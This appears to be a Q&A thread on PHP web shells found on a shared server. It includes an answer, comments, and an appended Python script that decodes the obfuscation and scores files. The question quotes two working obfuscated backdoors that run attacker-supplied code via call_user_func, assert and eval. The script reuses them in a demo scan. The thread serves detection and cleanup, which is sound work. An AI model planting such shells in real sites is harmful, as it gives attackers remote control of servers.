I have several web sites on a shared server, and have noticed a load of .php files appear in various folders, none of which were put there by me.

I am a .NET developer, so apart from one site which uses WordPress, none of my sites use PHP. Therefore, I can only assume that the server has been accessed, and suspicious files uploaded.

However, with my basic knowledge of PHP, I can't tell what these files are doing. I am hoping some PHP expert can help me.

Here is a sample...

<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);

...and another...

<?php

$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';@$adnmo($acnhe);@eval($acnhe); 
$k=substr("class",2)."ert"; @ $k(${"_PO"."ST"} ['335']);

Anyone able to explain what these would do if/when called?

DreamingOfSleep

1 Answer

Your WordPress site has been compromised. It's quite common that unpatched security vulnerabilities in WP allow users to inject these kinds of files which end up causing all sorts of trouble to your visitors (by redirecting them to malicious sites, for example).

You can safely delete this file, and you should do it ASAP.

Also, it's time to secure your WP installation (update the core to the latest version) and go through all of WP's core php files and look for similar strings within them (these malicious exploits sometimes allow core WP files to get injected too) and clean them up.

Javier Larroulet
  • Thanks, it was actually across a few sites, only one of which uses WP. I have deleted the files from all other sites, but as WP is such a large installation with so many .php files, I don't know if there are any in there that shouldn't be. Any idea how I clean the WP site? Thanks – DreamingOfSleep Sep 06 '18 at 16:50
  • If the site is on some flavor of linux, you could find all affected sites by using `grep` and delete the injected code with `sed` to make a replacement. You can even pipe both commands into a single one and make it recursive. Since you are mostly .net you probably are on windows, in which case I wouldn't know how to help – Javier Larroulet Sep 06 '18 at 17:05
  • I guess it's on Windows like you say. My problem is not finding .php files, I can do that easily, my problem is knowing which ones in the WP site are genuine and which aren't. None of the other sites use PHP, so any .php files there are suspicious, but as WP is built with PHP, I don't know what is genuine and what isn't. Any ideas? Thx – DreamingOfSleep Sep 06 '18 at 19:50
  • 1
    Oh I know finding php files is trivial. My point is that I don't know if Windows has something like grep and sed, which allow to search all files containing "something" and replace that "something" with "some other thing" (in this case, a blank space) in a one-liner. That said, these injections are usually the same across all files, so searching for all files containing `"s\x74\x72\x5fr\x65\x70\x6ca\x63e"` (which is simply the url enconded version of `str_replace`, not something you'd find in a non malicious payload but common on malicious ones) may help – Javier Larroulet Sep 06 '18 at 20:09
  • Thanks, that's a useful suggestion. Windows has equivalents of things like grep, but as I don't have console access to the server, I will probably have to write a script to do this. Still, with your useful comment here, it should be pretty easy to do. Thanks again. – DreamingOfSleep Sep 06 '18 at 22:16
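As an added illustration, not part of the original question or answer: the Python script below is my own example of the "script to do this" the comments end on. It does two things. First, it resolves the `\xHH` / `\NNN` escapes PHP accepts in double-quoted strings, so the literals in the second sample can be read as the function names they hide. Second, it walks a web root and scores every `.php` file by a few indicators the two samples exhibit (escaped string literals, `eval`/`assert` calls, a superglobal passed straight to `call_user_func`, a superglobal name assembled from string pieces), returning a review list. Everything it scans here is constructed: the three file paths and the benign file are invented for the demonstration, and the two malicious samples are the ones quoted in the question. The weights and the threshold are my own choices; a single indicator can appear in legitimate code, which is why one hit alone is not flagged, and a file that passes this scan has not been proven clean.

```python
import os
import re
import tempfile

# --- 1. De-obfuscating PHP string escapes -------------------------------------
# PHP double-quoted strings accept \xHH (hex) and \NNN (octal) escapes; the dropped
# files use them to keep function names out of plain-text searches. Only these two
# escape forms are handled (no \n, \\ etc.), which covers the samples in the question.
_HEX = re.compile(r'\\x([0-9A-Fa-f]{1,2})')
_OCT = re.compile(r'\\([0-7]{1,3})')
_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def decode_php_escapes(literal: str) -> str:
    """Resolve \\xHH and \\NNN escapes in the body of a PHP double-quoted string."""
    literal = _HEX.sub(lambda m: chr(int(m.group(1), 16)), literal)
    return _OCT.sub(lambda m: chr(int(m.group(1), 8)), literal)


def reveal_strings(php_source: str) -> list:
    """Return every double-quoted literal that uses escapes, decoded to plain text."""
    return [decode_php_escapes(body)
            for body in _DQ_STRING.findall(php_source)
            if '\\' in body]


# --- 2. Indicators and scoring -------------------------------------------------
# Each pattern that is present adds its weight. None is proof on its own, so the
# output is a list of files to review, not a verdict. Weights are my own choice.
INDICATORS = {
    "hex_or_octal_escape":     (1, re.compile(r'\\x[0-9A-Fa-f]{2}|\\[0-7]{3}')),
    "eval_or_assert_call":     (1, re.compile(r'\b(eval|assert)\s*\(')),
    "superglobal_as_callable": (2, re.compile(
        r'call_user_func(_array)?\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b')),
    "built_superglobal_name":  (2, re.compile(r'\$\{\s*["\'][^"\']*["\']\s*\.')),
}


def score_source(php_source: str) -> int:
    return sum(w for w, rx in INDICATORS.values() if rx.search(php_source))


def matched_indicators(php_source: str) -> list:
    return [name for name, (_, rx) in INDICATORS.items() if rx.search(php_source)]


def scan_tree(root: str, threshold: int = 2) -> list:
    """Walk a web root; return (relative path, score) for .php files at or above threshold."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                s = score_source(fh.read())
            if s >= threshold:
                hits.append((os.path.relpath(path, root).replace(os.sep, '/'), s))
    return sorted(hits)


# --- 3. Constructed demo tree --------------------------------------------------
# The two malicious samples are the ones quoted in the question; the benign file
# and all paths are invented for this demonstration.
SAMPLE_SHELL_1 = r'''<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);'''

SAMPLE_SHELL_2 = r'''<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';@$adnmo($acnhe);@eval($acnhe);
$k=substr("class",2)."ert"; @ $k(${"_PO"."ST"} ['335']);
'''

SAMPLE_BENIGN = r'''<?php
// constructed benign file: ordinary code an intact install might contain
function demo_slugify($title) {
    return strtolower(str_replace(' ', '-', trim($title)));
}
'''


def build_demo_tree() -> str:
    """Write the constructed files into a temporary web root and return its path."""
    root = tempfile.mkdtemp(prefix='phpscan_demo_')
    files = {
        'wp-content/uploads/x.php': SAMPLE_SHELL_1,      # constructed location
        'wp-content/plugins/demo/y.php': SAMPLE_SHELL_2, # constructed location
        'wp-includes/benign.php': SAMPLE_BENIGN,         # constructed location
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='utf-8') as fh:
            fh.write(body)
    return root


if __name__ == '__main__':
    print('decoded literals in sample 2:', reveal_strings(SAMPLE_SHELL_2))
    print('indicators in sample 1:', matched_indicators(SAMPLE_SHELL_1))
    for rel, s in scan_tree(build_demo_tree()):
        print(f'{s:2d}  {rel}')
```

Run as-is, the script prints the decoded literals from the second sample (`str_replace`, the `f`-padded form of `base64_decode`, and `asse`, which the code completes to `assert` with `.'rt'`) and flags the two constructed shell files while leaving the benign one out. To use it on a real site, point `scan_tree` at a copy of the web root; the matched-indicator list for each flagged file tells you which pattern tripped, so a file that only contains a legitimate `eval` is easy to dismiss.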